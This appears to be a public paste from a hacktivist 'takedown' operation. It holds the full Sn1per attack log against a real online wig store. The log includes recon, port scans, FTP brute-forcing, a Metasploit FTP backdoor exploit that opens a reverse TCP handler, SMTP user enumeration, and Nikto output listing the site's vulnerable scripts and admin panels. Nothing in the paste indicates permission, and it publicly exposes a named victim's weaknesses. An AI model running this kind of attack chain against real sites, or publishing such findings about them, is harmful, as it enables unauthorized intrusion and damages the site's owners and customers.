Advertisement
SaintDruG

#‎OpTakeDown_TheHumanityParty‬(2)

Jul 8th, 2016
2,459
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 156.19 KB | None | 0 0
  1. **TARGET: HAIRWIGSTORE.COM**
  2.  
  3. ____
  4. _________ / _/___ ___ _____
  5. / ___/ __ \ / // __ \/ _ \/ ___/
  6. (__ ) / / // // /_/ / __/ /
  7. /____/_/ /_/___/ .___/\___/_/
  8. /_/
  9.  
  10. + -- --=[http://crowdshield.com
  11. + -- --=[sn1per v1.7 by 1N3
  12.  
  13. ################################### Running recon #################################
  14. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  15. Server: 8.8.8.8
  16. Address: 8.8.8.8#53
  17.  
  18. Non-authoritative answer:
  19. Name: hairwigstore.com
  20. Address: 192.254.237.91
  21.  
  22. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  23. hairwigstore.com has address 192.254.237.91
  24. hairwigstore.com mail is handled by 0 hairwigstore.com.
  25.  
  26. Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected]
  27.  
  28. [+] Target is hairwigstore.com
  29. [+] Loading modules.
  30. [+] Following modules are loaded:
  31. [x] [1] ping:icmp_ping - ICMP echo discovery module
  32. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  33. [x] [3] ping:udp_ping - UDP-based ping discovery module
  34. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  35. [x] [5] infogather:portscan - TCP and UDP PortScanner
  36. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  37. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  38. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  39. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  40. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  41. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  42. [x] [12] fingerprint:smb - SMB fingerprinting module
  43. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  44. [+] 13 modules registered
  45. [+] Initializing scan engine
  46. [+] Running scan engine
  47. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.254.237.91. Module test failed
  48. [-] ping:udp_ping module: no closed/open UDP ports known on 192.254.237.91. Module test failed
  49. [-] No distance calculation. 192.254.237.91 appears to be dead or no ports known
  50. [+] Host: 192.254.237.91 is up (Guess probability: 50%)
  51. [+] Target: 192.254.237.91 is alive. Round-Trip Time: 0.22598 sec
  52. [+] Selected safe Round-Trip Time value is: 0.45196 sec
  53. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  54. [-] fingerprint:smb need either TCP port 139 or 445 to run
  55. [-] fingerprint:snmp: need UDP port 161 open
  56. [+] Primary guess:
  57. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  58. [+] Other guesses:
  59. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  60. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  61. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  62. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  63. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  64. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  65. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  66. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  67. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
  68. [+] Cleaning up scan engine
  69. [+] Modules deinitialized
  70. [+] Execution completed.
  71. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  72.  
  73. ; <<>> DiG 9.10.3-P4-Debian <<>> -x hairwigstore.com
  74. ;; global options: +cmd
  75. ;; Got answer:
  76. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7036
  77. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  78.  
  79. ;; OPT PSEUDOSECTION:
  80. ; EDNS: version: 0, flags:; udp: 4096
  81. ;; QUESTION SECTION:
  82. ;com.hairwigstore.in-addr.arpa. IN PTR
  83.  
  84. ;; AUTHORITY SECTION:
  85. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073958 1800 900 604800 3600
  86.  
  87. ;; Query time: 181 msec
  88. ;; SERVER: 8.8.8.8#53(8.8.8.8)
  89. ;; WHEN: Thu Jul 07 20:43:12 EEST 2016
  90. ;; MSG SIZE rcvd: 126
  91.  
  92.  
  93. Whois Server Version 2.0
  94.  
  95. Domain names in the .com and .net domains can now be registered
  96. with many different competing registrars. Go to http://www.internic.net
  97. for detailed information.
  98.  
  99. Domain Name: HAIRWIGSTORE.COM
  100. Registrar: GODADDY.COM, LLC
  101. Sponsoring Registrar IANA ID: 146
  102. Whois Server: whois.godaddy.com
  103. Referral URL: http://www.godaddy.com
  104. Name Server: NS847.HOSTGATOR.COM
  105. Name Server: NS848.HOSTGATOR.COM
  106. Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
  107. Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
  108. Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  109. Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
  110. Updated Date: 02-jan-2015
  111. Creation Date: 19-oct-2008
  112. Expiration Date: 19-oct-2016
  113.  
  114. >>> Last update of whois database: Thu, 07 Jul 2016 17:42:57 GMT <<<
  115.  
  116. For more information on Whois status codes, please visit https://icann.org/epp
  117.  
  118. NOTICE: The expiration date displayed in this record is the date the
  119. registrar's sponsorship of the domain name registration in the registry is
  120. currently set to expire. This date does not necessarily reflect the expiration
  121. date of the domain name registrant's agreement with the sponsoring
  122. registrar. Users may consult the sponsoring registrar's Whois database to
  123. view the registrar's reported date of expiration for this registration.
  124.  
  125. TERMS OF USE: You are not authorized to access or query our Whois
  126. database through the use of electronic processes that are high-volume and
  127. automated except as reasonably necessary to register domain names or
  128. modify existing registrations; the Data in VeriSign Global Registry
  129. Services' ("VeriSign") Whois database is provided by VeriSign for
  130. information purposes only, and to assist persons in obtaining information
  131. about or related to a domain name registration record. VeriSign does not
  132. guarantee its accuracy. By submitting a Whois query, you agree to abide
  133. by the following terms of use: You agree that you may use this Data only
  134. for lawful purposes and that under no circumstances will you use this Data
  135. to: (1) allow, enable, or otherwise support the transmission of mass
  136. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  137. or facsimile; or (2) enable high volume, automated, electronic processes
  138. that apply to VeriSign (or its computer systems). The compilation,
  139. repackaging, dissemination or other use of this Data is expressly
  140. prohibited without the prior written consent of VeriSign. You agree not to
  141. use electronic processes that are automated and high-volume to access or
  142. query the Whois database except as reasonably necessary to register
  143. domain names or modify existing registrations. VeriSign reserves the right
  144. to restrict your access to the Whois database in its sole discretion to ensure
  145. operational stability. VeriSign may restrict or terminate your access to the
  146. Whois database for failure to abide by these terms of use. VeriSign
  147. reserves the right to modify these terms at any time.
  148.  
  149. The Registry database contains ONLY .COM, .NET, .EDU domains and
  150. Registrars.
  151. fgets: Connection reset by peer
  152. Smartmatch is experimental at ./dnsenum.pl line 698.
  153. Smartmatch is experimental at ./dnsenum.pl line 698.
  154. dnsenum.pl VERSION:1.2.4
  155.  
  156. ----- hairwigstore.com -----
  157.  
  158.  
  159. Host's addresses:
  160. __________________
  161.  
  162. hairwigstore.com. 14389 IN A 192.254.237.91
  163.  
  164.  
  165. Name Servers:
  166. ______________
  167.  
  168. ns847.hostgator.com. 43200 IN A 192.254.190.45
  169. ns848.hostgator.com. 43200 IN A 192.254.186.42
  170.  
  171.  
  172. Mail (MX) Servers:
  173. ___________________
  174.  
  175. hairwigstore.com. 14388 IN A 192.254.237.91
  176.  
  177.  
  178. Trying Zone Transfers and getting Bind Versions:
  179. _________________________________________________
  180.  
  181.  
  182. Trying Zone Transfer for hairwigstore.com on ns847.hostgator.com ...
  183. AXFR record query failed: REFUSED
  184.  
  185. Trying Zone Transfer for hairwigstore.com on ns848.hostgator.com ...
  186. AXFR record query failed: REFUSED
  187.  
  188. brute force file not specified, bay.
  189.  
  190. ____ _ _ _ _ _____
  191. / ___| _ _| |__ | (_)___| |_|___ / _ __
  192. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  193. ___) | |_| | |_) | | \__ \ |_ ___) | |
  194. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  195.  
  196. # Fast Subdomains Enumeration tool using Search Engines and BruteForce
  197. # Coded By Ahmed Aboul-Ela - @aboul3la
  198. # Special Thanks to Ibrahim Mosaad - @ibrahim_mosaad for his contributions
  199.  
  200. [-] Enumerating subdomains now for hairwigstore.com
  201. [-] verbosity is enabled, will show the subdomains results in realtime
  202. [-] Searching now in Baidu..
  203. [-] Searching now in Yahoo..
  204. [-] Searching now in Google..
  205. [-] Searching now in Bing..
  206. [-] Searching now in Ask..
  207. [-] Searching now in Netcraft..
  208. [-] Searching now in DNSdumpster..
  209. Bing: www.hairwigstore.com
  210. Yahoo: www.hairwigstore.com
  211. [-] Total Unique Subdomains Found: 1
  212. www.hairwigstore.com
  213.  
  214. ################################### Pinging host ###################################
  215. PING hairwigstore.com (192.254.237.91) 56(84) bytes of data.
  216. 64 bytes from 192.254.237.91 (192.254.237.91): icmp_seq=1 ttl=51 time=225 ms
  217.  
  218. --- hairwigstore.com ping statistics ---
  219. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  220. rtt min/avg/max/mdev = 225.667/225.667/225.667/0.000 ms
  221.  
  222. ################################### Running TCP port scan ##########################
  223.  
  224. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:43 EEST
  225. Nmap scan report for hairwigstore.com (192.254.237.91)
  226. Host is up (0.23s latency).
  227. Not shown: 23 closed ports, 6 filtered ports
  228. PORT STATE SERVICE
  229. 21/tcp open ftp
  230. 25/tcp open smtp
  231. 80/tcp open http
  232. 110/tcp open pop3
  233. 443/tcp open https
  234. 3306/tcp open mysql
  235. 8080/tcp open http-proxy
  236. 8443/tcp open https-alt
  237.  
  238. Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds
  239. ################################### Running UDP port scan ##########################
  240.  
  241. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:43 EEST
  242. WARNING: a TCP scan type was requested, but no tcp ports were specified. Skipping this scan type.
  243. Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
  244.  
  245. ################################### Running Intrusive Scans ########################
  246. + -- --=[Port 21 opened... running tests...
  247.  
  248. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:43 EEST
  249. Nmap scan report for hairwigstore.com (192.254.237.91)
  250. Host is up (0.22s latency).
  251. PORT STATE SERVICE VERSION
  252. 21/tcp open ftp Pure-FTPd
  253. | ftp-brute:
  254. | Accounts: No valid accounts found
  255. | Statistics: Performed 21 guesses in 84 seconds, average tps: 0
  256. |_ ERROR: Too many retries, aborted ...
  257.  
  258. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  259. Nmap done: 1 IP address (1 host up) scanned in 86.52 seconds
  260.  
  261.  
  262. _---------.
  263. .' ####### ;."
  264. .---,. ;@ @@`; .---,..
  265. ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
  266. '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
  267. `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
  268. "--'.@@@ -.@ @ ,'- .'--"
  269. ".@' ; @ @ `. ;'
  270. |@@@@ @@@ @ .
  271. ' @@@ @@ @@ ,
  272. `.@@@@ @@ .
  273. ',@@ @ ; _____________
  274. ( 3 C ) /|___ / Metasploit! \
  275. ;@'. __*__,." \|--- \_____________/
  276. '(.,...."/
  277.  
  278.  
  279. Save 45% of your time on large engagements with Metasploit Pro
  280. Learn more on http://rapid7.com/metasploit
  281.  
  282. =[ metasploit v4.12.7-dev ]
  283. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
  284. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
  285. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  286.  
  287. RHOST => hairwigstore.com
  288. RHOSTS => hairwigstore.com
  289. [*] hairwigstore.com:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  290. 220-You are user number 4 of 150 allowed.
  291. 220-Local time is now 12:45. Server port: 21.
  292. 220-IPv6 connections are also welcome on this server.
  293. 220 You will be disconnected after 15 minutes of inactivity.
  294. [*] hairwigstore.com:21 - USER: 331 User v44e:) OK. Password required
  295. [*] Exploit completed, but no session was created.
  296. [*] Started reverse TCP double handler on 10.42.0.14:4444
  297. [*] hairwigstore.com:21 - Sending Backdoor Command
  298. [*] Exploit completed, but no session was created.
  299. + -- --=[Port 22 closed... skipping.
  300. + -- --=[Port 23 closed... skipping.
  301. + -- --=[Port 25 opened... running tests...
  302.  
  303. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:45 EEST
  304. Nmap scan report for hairwigstore.com (192.254.237.91)
  305. Host is up (0.22s latency).
  306. PORT STATE SERVICE VERSION
  307. 25/tcp open smtp Exim smtpd 4.86_1
  308. | smtp-commands: gator3130.hostgator.com Hello hairwigstore.com [46.165.242.166], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
  309. |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
  310. | smtp-enum-users:
  311. |_ Couldn't find any accounts
  312. |_smtp-open-relay: Couldn't establish connection on port 25
  313. | smtp-vuln-cve2010-4344:
  314. |_ The SMTP server is not Exim: NOT VULNERABLE
  315. Service Info: Host: gator3130.hostgator.com
  316.  
  317. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  318. Nmap done: 1 IP address (1 host up) scanned in 19.54 seconds
  319. Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
  320.  
  321. ----------------------------------------------------------
  322. | Scan Information |
  323. ----------------------------------------------------------
  324.  
  325. Mode ..................... VRFY
  326. Worker Processes ......... 5
  327. Usernames file ........... BruteX/wordlists/simple-users.txt
  328. Target count ............. 1
  329. Username count ........... 34
  330. Target TCP port .......... 25
  331. Query timeout ............ 5 secs
  332. Target domain ............
  333.  
  334. ######## Scan started at Thu Jul 7 20:45:46 2016 #########
  335. ######## Scan completed at Thu Jul 7 20:45:56 2016 #########
  336. 0 results.
  337.  
  338. 34 queries in 10 seconds (3.4 queries / sec)
  339.  
  340. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  341. %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  342. %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  343. %% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
  344. %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  345. %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  346. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  347. %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  348. %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
  349. %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
  350. %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
  351. %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
  352. %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
  353. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
  354. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
  355. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  356.  
  357.  
  358. Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
  359. Learn more on http://rapid7.com/metasploit
  360.  
  361. =[ metasploit v4.12.7-dev ]
  362. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
  363. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
  364. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  365.  
  366. RHOSTS => hairwigstore.com
  367. RHOST => hairwigstore.com
  368. [*] 192.254.237.91:25 - 192.254.237.91:25 Banner: 220-gator3130.hostgator.com ESMTP Exim 4.86_1 #1 Thu, 07 Jul 2016 12:46:10 -0500
  369. 220-We do not authorize the use of this system to transport unsolicited,
  370. 220 and/or bulk e-mail.
  371. [*] 192.254.237.91:25 - 192.254.237.91:25 could not be enumerated (no EXPN, no VRFY, invalid RCPT)
  372. [*] hairwigstore.com:25 - Scanned 1 of 1 hosts (100% complete)
  373. [*] Auxiliary module execution completed
  374. + -- --=[Port 53 closed... skipping.
  375. + -- --=[Port 79 closed... skipping.
  376. + -- --=[Port 80 opened... running tests...
  377. ################################### Checking for WAF ##############################
  378.  
  379. ^ ^
  380. _ __ _ ____ _ __ _ _ ____
  381. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  382. | V V // o // _/ | V V // 0 // 0 // _/
  383. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  384. <
  385. ...'
  386.  
  387. WAFW00F - Web Application Firewall Detection Tool
  388.  
  389. By Sandro Gauci && Wendel G. Henrique
  390.  
  391. Checking http://hairwigstore.com
  392. The site http://hairwigstore.com is behind a ModSecurity (OWASP CRS)
  393. Number of requests: 11
  394.  
  395. ################################### Gathering HTTP Info ###########################
  396. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
  397.  
  398. __ ______ _____
  399. \ \/ / ___|_ _|
  400. \ /\___ \ | |
  401. / \ ___) || |
  402. /_/\_|____/ |_|
  403.  
  404. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  405. + -- --=[Target: hairwigstore.com:80
  406. + -- --=[Site not vulnerable to Cross-Site Tracing!
  407. + -- --=[Site not vulnerable to Host Header Injection!
  408. + -- --=[Site vulnerable to Cross-Frame Scripting!
  409. + -- --=[Site vulnerable to Clickjacking!
  410.  
  411. HTTP/1.1 405 Not Allowed
  412. Server: nginx/1.10.1
  413. Date: Thu, 07 Jul 2016 17:46:23 GMT
  414. Content-Type: text/html
  415. Content-Length: 173
  416. Connection: close
  417.  
  418. <html>
  419. <head><title>405 Not Allowed</title></head>
  420. <body bgcolor="white">
  421. <center><h1>405 Not Allowed</h1></center>
  422. <hr><center>nginx/1.10.1</center>
  423. </body>
  424. </html>
  425.  
  426. HTTP/1.1 301 Moved Permanently
  427. Server: nginx/1.10.1
  428. Date: Thu, 07 Jul 2016 17:46:24 GMT
  429. Content-Type: text/html; charset=iso-8859-1
  430. Content-Length: 302
  431. Connection: keep-alive
  432. Location: http://www.hairwigstore.com/
  433.  
  434. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  435. <html><head>
  436. <title>301 Moved Permanently</title>
  437. </head><body>
  438. <h1>Moved Permanently</h1>
  439. <p>The document has moved <a href="http://www.hairwigstore.com/">here</a>.</p>
  440. <hr>
  441. <address>Apache Server at hairwigstore.com Port 80</address>
  442. </body></html>
  443.  
  444.  
  445.  
  446.  
  447. ################################### Checking HTTP Headers #########################
  448. + -- --=[Checking if X-Content options are enabled on hairwigstore.com...
  449.  
  450. + -- --=[Checking if X-Frame options are enabled on hairwigstore.com...
  451.  
  452. + -- --=[Checking if X-XSS-Protection header is enabled on hairwigstore.com...
  453.  
  454. + -- --=[Checking HTTP methods on hairwigstore.com...
  455.  
  456. + -- --=[Checking if TRACE method is enabled on hairwigstore.com...
  457.  
  458. + -- --=[Checking for open proxy on hairwigstore.com...
  459. <head>
  460. <meta name="robots" content="noarchive" />
  461. <meta name="googlebot" content="nosnippet" />
  462. </head>
  463. <body>
  464. <div align=center>
  465. <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (11)</h3>
  466. </div>
  467. </body>
  468. </html>
  469. + -- --=[Enumerating software on hairwigstore.com...
  470. Server: nginx/1.10.1
  471.  
  472. + -- --=[Checking if Strict-Transport-Security is enabled on hairwigstore.com...
  473.  
  474. + -- --=[Checking for Flash cross-domain policy on hairwigstore.com...
  475. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  476. <html><head>
  477. <title>301 Moved Permanently</title>
  478. </head><body>
  479. <h1>Moved Permanently</h1>
  480. <p>The document has moved <a href="http://www.hairwigstore.com/crossdomain.xml">here</a>.</p>
  481. <hr>
  482. <address>Apache Server at hairwigstore.com Port 80</address>
  483. </body></html>
  484.  
  485. + -- --=[Checking for Silverlight cross-domain policy on hairwigstore.com...
  486. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  487. <html><head>
  488. <title>301 Moved Permanently</title>
  489. </head><body>
  490. <h1>Moved Permanently</h1>
  491. <p>The document has moved <a href="http://www.hairwigstore.com/clientaccesspolicy.xml">here</a>.</p>
  492. <hr>
  493. <address>Apache Server at hairwigstore.com Port 80</address>
  494. </body></html>
  495.  
  496. + -- --=[Checking for HTML5 cross-origin resource sharing on hairwigstore.com...
  497.  
  498. + -- --=[Retrieving robots.txt on hairwigstore.com...
  499. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  500. <html><head>
  501. <title>301 Moved Permanently</title>
  502. </head><body>
  503. <h1>Moved Permanently</h1>
  504. <p>The document has moved <a href="http://www.hairwigstore.com/robots.txt">here</a>.</p>
  505. <hr>
  506. <address>Apache Server at hairwigstore.com Port 80</address>
  507. </body></html>
  508.  
  509. + -- --=[Retrieving sitemap.xml on hairwigstore.com...
  510. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  511. <html><head>
  512. <title>301 Moved Permanently</title>
  513. </head><body>
  514. <h1>Moved Permanently</h1>
  515. <p>The document has moved <a href="http://www.hairwigstore.com/sitemap.xml">here</a>.</p>
  516. <hr>
  517. <address>Apache Server at hairwigstore.com Port 80</address>
  518. </body></html>
  519.  
  520. + -- --=[Checking cookie attributes on hairwigstore.com...
  521.  
  522. + -- --=[Checking for ASP.NET Detailed Errors on hairwigstore.com...
  523.  
  524.  
  525. ################################### Running Web Vulnerability Scan ################
  526. - Nikto v2.1.6
  527. ---------------------------------------------------------------------------
  528. + Target IP: 192.254.237.91
  529. + Target Hostname: hairwigstore.com
  530. + Target Port: 80
  531. + Start Time: 2016-07-07 20:46:36 (GMT3)
  532. ---------------------------------------------------------------------------
  533. + Server: nginx/1.10.1
  534. + The anti-clickjacking X-Frame-Options header is not present.
  535. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  536. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  537. + Root page / redirects to: http://www.hairwigstore.com/
  538. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  539. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
  540. + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
  541. + /securecontrolpanel/: Web Server Control Panel
  542. + /webmail/: Web based mail package installed.
  543. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
  544. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
  545. + OSVDB-2117: /cpanel/: Web-based control panel
  546. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
  547. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
  548. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  549. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  550. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  551. + /controlpanel/: Admin login page/section found.
  552. + Server leaks inodes via ETags, header found with file /cgi-sys/c99.php, fields: 0x56a90723 0x16e2
  553. + 8257 requests: 0 error(s) and 18 item(s) reported on remote host
  554. + End Time: 2016-07-07 21:25:23 (GMT3) (2327 seconds)
  555. ---------------------------------------------------------------------------
  556. + 1 host(s) tested
  557. ################################### Saving Web Screenshots ########################
  558. [+] Screenshot saved to /root/Sn1per/loot/hairwigstore.com-port80.jpg
  559.  
  560. (cutycapt:27720): Gtk-WARNING **: Theme directory devices/scalable of theme maia has no size field
  561.  
  562. openjdk version "1.8.0_91"
  563. OpenJDK Runtime Environment (build 1.8.0_91-8u91-b14-3-b14)
  564. OpenJDK 64-Bit Server VM (build 25.91-b14, mixed mode)
  565. ################################### Running Google Hacking Queries #############
  566. ################################### Running InUrlBR OSINT Queries ##############
  567.  
  568. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  569. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
  570. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
  571. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
  572. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
  573. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
  574. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  575.  
  576. __[ ! ] Neither war between hackers, nor peace for the system.
  577. __[ ! ] http://blog.inurl.com.br
  578. __[ ! ] http://fb.com/InurlBrasil
  579. __[ ! ] http://twitter.com/@googleinurl
  580. __[ ! ] http://github.com/googleinurl
  581. __[ ! ] Current PHP version::[ 5.6.22-2 ]
  582. __[ ! ] Current script owner::[ root ]
  583. __[ ! ] Current uname::[ Linux anonymous 4.6.0-parrot-amd64 #1 SMP Parrot 4.6.2-2parrot0 (2016-06-29) x86_64 ]
  584. __[ ! ] Current pwd::[ /root/Sn1per ]
  585. __[ ! ] Help: php inurlbr.php --help
  586. ------------------------------------------------------------------------------------------------------------------------
  587.  
  588. [ ! ] Starting SCANNER INURLBR 2.1 at [07-07-2016 21:25:42]
  589. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  590. It is the end user's responsibility to obey all applicable local, state and federal laws.
  591. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  592.  
  593. [ INFO ][ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-hairwigstore.com.txt ]
  594. [ INFO ][ DORK ]::[ site:hairwigstore.com ]
  595. [ INFO ][ SEARCHING ]:: {
  596. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.la ]
  597.  
  598. [ INFO ][ SEARCHING ]::
  599. -[:::]
  600. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  601.  
  602. [ INFO ][ SEARCHING ]::
  603. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  604. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.gr ID: 013269018370076798483:wdba3dlnxqm ]
  605.  
  606. [ INFO ][ SEARCHING ]::
  607. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  608.  
  609. [ INFO ][ TOTAL FOUND VALUES ]:: [ 19 ]
  610.  
  611.  
  612. _[ - ]::--------------------------------------------------------------------------------------------------------------
  613. |_[ + ] [ 0 / 19 ]-[21:26:01] [ - ]
  614. |_[ + ] Target:: [ http://www.hairwigstore.com/ ]
  615. |_[ + ] Exploit::
  616. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  617. |_[ + ] More details:: / - / , ISP:
  618. |_[ + ] Found:: UNIDENTIFIED
  619.  
  620. _[ - ]::--------------------------------------------------------------------------------------------------------------
  621. |_[ + ] [ 1 / 19 ]-[21:26:03] [ - ]
  622. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Wigs ]
  623. |_[ + ] Exploit::
  624. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  625. |_[ + ] More details:: / - / , ISP:
  626. |_[ + ] Found:: UNIDENTIFIED
  627.  
